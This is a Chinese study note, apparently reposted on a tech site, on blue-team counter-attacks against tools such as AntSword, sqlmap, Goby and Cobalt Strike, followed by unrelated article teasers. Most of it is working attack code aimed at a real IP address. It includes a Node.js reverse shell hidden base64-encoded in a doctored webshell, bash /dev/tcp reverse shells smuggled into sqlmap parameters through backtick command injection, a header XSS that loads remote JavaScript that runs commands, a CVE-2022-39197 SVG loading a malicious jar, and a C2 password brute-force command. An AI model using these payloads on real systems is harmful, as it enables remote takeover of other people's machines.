7、应急响应-战中溯源反制对抗上线蚁剑CSGobySqlmap等安全工具

用途:个人学习笔记,欢迎指正

目录

背景:

一、后门修改反制上线

二、Linux溯源反制-SQL注入工具-SQLMAP

1、测试反弹编码加密:

2、构造注入点页面test.php固定注入参数值,等待攻击者进行注入

3、红队攻击者进行注入测试:

三、溯源反制-漏洞扫描工具-Goby

(1)、构造页面index.php:

(2)、将index.php,1.js放入网站目录

(3)、模拟红队使用Goby扫描分析漏洞触发代码,反而被蓝队拿到权限,CS上线

四、 溯源反制-远程控制工具-CobaltStrike

1、伪造流量批量上线(欺骗防御)

2、利用漏洞(CVE-2022-39197)

3、反制Server,爆破密码(通用)


背景:

黑客一般会用到工具Sqlmap,Goby等对目标网站的现有资产做批量扫描和测试,同时也会利用Web应用漏洞上传后门来上线肉机,用到工具例如:蚁剑,CS等,那么作为蓝队应急人员,就可以针对这些行为采取反制手段。

一、后门修改反制上线

原理:网站目录查到红队后门时,蓝队修改后门添加上线代码,当红队使用蚁剑连接后门时触发代码,反而被上线.

1、后门修改测试:
<?php
header('HTTP/1.1 500 <img src=# onerror=alert(1)>');2、后门修改上线Nodejs代码:
var net = require("net"), sh=
require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(1122, "47.94.236.117",   //蓝队控制端IP和端口
function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});3、编码组合后:
header("HTTP/1.1 500 Not <img src=# onerror='eval(new
Buffer(`mFyIG5ldCA9IHJIcXVpcmUolm5ldClpLCBzaCA9IHJIcXVpcmUolmNoaW
xkX3Byb2NIc3MiKS5leGVjKCJjbWQuZXhllik7CnZhciBjbGllbnQgPSBuZXcgbmVo
LINvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgljQ3Ljk0LjIzNi4xMTciLC
BmdW5jdGlvbigpe2NsaWVudC5waXBIKHNoLnNOZGluKTtzaC5zdGRvdXQucGlwZShj
bGllbnQpO3NoLnNOZGVyci5waXBIKGNsaWVudCk7fSk7`,`base64`).toString()
)'>");管道符` `中放的就是2中代码的base64加密值

二、Linux溯源反制-SQL注入工具-SQLMAP

蓝队提前构造注入页面诱使红队进行sqlmap注入拿到红队机器权限

环境:红队攻击机和蓝队主机都是linux系统
原理:
命令管道符:ping "`dir`"    ,   linux系统执行该命令时,管道符中的字符串被当作命令执行


sqlmap -u "http://47.94.236.117/test.html?id=aaa&b="`dir`"
sqlmap -u "http://47.94.236.117/test.html?id=aaa&b=`exec /bin/sh
0</dev/tcp/47.94.236.117/2233 1>&0 2>&0`"

同样以上命令在红队攻击机执行时,参数b管道符中的字符串会被当做命令执行。

1、测试反弹编码加密:

bash -i >&/dev/tcp/47.94.236.117/2233 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzlzMzMgMD4mMQ==
echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzlzMzMgMD4mMQ==
| base64 -d |bash -i

2、构造注入点页面test.php固定注入参数值,等待攻击者进行注入

<html>
<head><meta charset="utf-8"><title>A sqlmap honeypot demo</title>
</head>
<body><input>search the user</input>  <!--创建一个空白表单-><form action="username.html" method="post"
enctype="text/plain"><!--创建一个隐藏的表单--><input type='hidden' name='name'
value="xiaodi&id=45273434&query=shell`echo
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LZIzMzMgMD4mMQ==
base64 -d|bash -i`&port=6379"/><!--创建一个按钮,提交表单内容-><input type="submit" value='提交'></form>
</body>
</html>

3、红队攻击者使用Sqlmap进行注入测试反被上线

原理:红队执行这个注入命令时,管道符中的加密字符串被解密后执行,而解密执行的命令就是反弹shell的命令,使用Sqlmap工具时不知不觉就把shell权限给出去了

sqlmap -u "http://xx.xx.xx.xx/test.php" --data
"name=xiaodi&id=45273434&query=shell`echo
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ== |
base64 -d|bash -i`&port=6379"

 

三、溯源反制-漏洞扫描工具-Goby

环境:蓝队:Linux系统  Web程序
           红队:Windows10  Goby

原理:蓝队在红队攻击目标上写一个特殊文件,红队用goby扫描分析时会触发反制被蓝队拿到机器权限。

1、构造页面index.php:

<?php
header("X-Powered-By:PHP/<img src=1 onerror=import(unescape('http%3A//47.94.236.117/1.js'))>");
?>
<head>
<title>TEST</title>
</head>
<body>
testtest
</body>
</html>

构造1.js代码:  cs上线只需要把calc.exe改成powershell代码

(function(){
require('child_process').exec('calc.exe');
})();

2、将index.php,1.js放入网站目录

3、模拟红队使用Goby扫描分析漏洞触发代码,反而被蓝队拿到权限,CS上线

四、 溯源反制-远程控制工具-CobaltStrike

蓝队:Linux Web
红队:Windows10  Goby
对抗Cobaltstrike中的手段:

1、伪造流量批量上线(欺骗防御)

https://mp.weixin.qq.com/s/VCRg6F9Wq-yg-qajDoJuaw

2、利用漏洞(CVE-2022-39197)

Cobalt Strike <=4.7 XSS
·获取真实ip地址
·获取NTLM
·RCE
·SSRF

地址:https://github.com/its-arun/CVE-2022-39197

(1)、蓝队修改EXP里面的执行命令后编译成jar包
修改:EvilJar/src/main/java/Exploit.java  中的执行命令


(2)、蓝队修改svg加载地址并架设Web服务


修改:evil.svg  指向url地址,只要evil.svg被访问就会加载这个jar包,命令就会执行。

<svg xmIns="http://www.w3.org/2000/svg" xmIns:xlink="http://www.w3.org/1999/xlink" version="1.0">
<script type="application/java-archive" xlink:href="http://47.94.236.117:8888/EvilJar-1.0-jar-with-dependencies.jar"/>
<text>CVE-2022-39197</text>
</svg>

架设Web服务: 

python -m http.server 8888

(3)、蓝队利用EXP主动运行红队的后门被上线,攻击者CS客户端进程查看时触发加载蓝队架设的web服务,jar包中的命令就会执行。

python cve-2022-39197.py artifact.exe http://47.94.236.117:8888/evil.svg原理:蓝队利用exp主动运行后门被红队上线,当红队CS客户端查看进程时触发加载这个web服务evil.svg
文件,而这个文件又加载了EvilJar-1.0-jar-with-dependencies.jar,这个jar包中蓝队构造的命
令就被执行,从而达到反制红队的效果。

3、反制Server,爆破密码(通用)

针对没有采用隐匿C2地址的技术导致的反制(后门样本被溯源到C2地址)

https://github.com/ryanohoro/csbruter

python csbruter.py 47.94.236.117 pass.txt 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/443761.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

asdf安装不同版本的nodejs和yarn和pnpm

安装asdf 安装nodejs nodejs版本 目前项目中常用的是14、16和18 安装插件 asdf plugin add nodejs https://github.com/asdf-vm/asdf-nodejs.git asdf plugin-add yarn https://github.com/twuni/asdf-yarn.git可以查看获取所有的nodejs版本 asdf list all nodejs有很多找…

秋招面试—JS篇

2024 JavaScript面试题 1.new 操作符的工作原理 ①.创建一个新的空对象 ②.将这个对象的原型设置为函数的 prototype 对象 ③.让函数的this指向该对象&#xff0c;为函数添加属性和方法 ④.最后返回这个对象 2.什么是DOM&#xff0c;什么是BOM? DOM&#xff1a;文档对象…

hbuilderx uniapp运行到真机控制台显示手机端调试基座版本号1.0.0,调用uni.share提示打包时未添加share模块

记录一个困扰了几天的一个蠢问题&#xff0c;发现真相的我又气又笑。 由于刚开始接触uniapp 移动端开发&#xff0c;有个需求需要使用uni.share API&#xff0c;但是我运行项目老提示打包时没配置share模块 我确实没在manifest内配置。网上搜了一些资料&#xff0c;但是我看官…

蓝桥杯2024/1/31----第十届省赛题笔记

题目要求&#xff1a; 1、 基本要求 1.1 使用大赛组委会提供的国信长天单片机竞赛实训平台&#xff0c;完成本试题的程序设计 与调试。 1.2 选手在程序设计与调试过程中&#xff0c;可参考组委会提供的“资源数据包”。 1.3 请注意&#xff1a; 程序编写、调试完成后选手…

Hadoop3.x基础(2)- HDFS

来源&#xff1a;B站尚硅谷 目录 HDFS概述HDFS产出背景及定义HDFS优缺点HDFS组成架构HDFS文件块大小&#xff08;面试重点&#xff09; HDFS的Shell操作&#xff08;开发重点&#xff09;基本语法命令大全常用命令实操准备工作上传下载HDFS直接操作 HDFS的API操作HDFS的API案例…

【Linux C | I/O模型】Unix / Linux系统的5种IO模型 | 图文详解

&#x1f601;博客主页&#x1f601;&#xff1a;&#x1f680;https://blog.csdn.net/wkd_007&#x1f680; &#x1f911;博客内容&#x1f911;&#xff1a;&#x1f36d;嵌入式开发、Linux、C语言、C、数据结构、音视频&#x1f36d; &#x1f923;本文内容&#x1f923;&a…

前端使用cache storage实现远程图片缓存

Cache Storage 的主要特点和用途 缓存网络资源&#xff1a;可以将经常访问的网络资源缓存到 Cache Storage 中&#xff0c;以提高网页加载速度&#xff0c;减少网络请求。离线访问&#xff1a;当用户处于离线状态时&#xff0c;可以使用 Cache Storage 中的缓存资源来加载网页…

高等数学:微分

本文主要参考视频&#xff1a; 【建议收藏】同济七版《高等数学》精讲视频 | 期末考试 | 考研零基础 | 高数小白_哔哩哔哩_bilibili 3.3.1.1 微分的定义_哔哩哔哩_bilibili 3.3.5.1 导数与微分区别_哔哩哔哩_bilibili 仅供本人学习使用。 什么是微分 相对于导数来说&#xff0c…

【数据分享】1929-2023年全球站点的逐日最高气温数据(Shp\Excel\免费获取)

气象数据是在各项研究中都经常使用的数据&#xff0c;气象指标包括气温、风速、降水、湿度等指标&#xff0c;其中又以气温指标最为常用&#xff01;说到气温数据&#xff0c;最详细的气温数据是具体到气象监测站点的气温数据&#xff01; 之前我们分享过1929-2023年全球气象站…

springboot144基于mvc的高校办公室行政事务管理系统设计与实现

简介 【毕设源码推荐 javaweb 项目】基于springbootvue 的 适用于计算机类毕业设计&#xff0c;课程设计参考与学习用途。仅供学习参考&#xff0c; 不得用于商业或者非法用途&#xff0c;否则&#xff0c;一切后果请用户自负。 看运行截图看 第五章 第四章 获取资料方式 **项…

高通GAIA V3命令参考手册的研读学习(十三):GAIA通知

如前文《高通GAIA V3命令参考手册的研读学习&#xff08;四&#xff09;》所述&#xff0c;PDU一共有四种&#xff0c;前面已经讲了命令、回应以及错误码&#xff0c;现在来看最后一种&#xff1a;通知。 4. QTIL GAIA通知 通知发送的方向&#xff0c;是由设备发送到移动应用…

Redis入门 -- 用java操作redis -- 苍穹外卖day05

1.Redis入门 1.1 Redis简介 Redis是一个基于内存的Key-value 结构数据库。 redis将数据存在内存当中。-->内存存储 mysql将数据通过数据文件的方式存在磁盘上。---> 磁盘存储 Redis : 基于内存存储&#xff0c;读写信息高。 适合存储热点数据(热点商品 &#xff0c…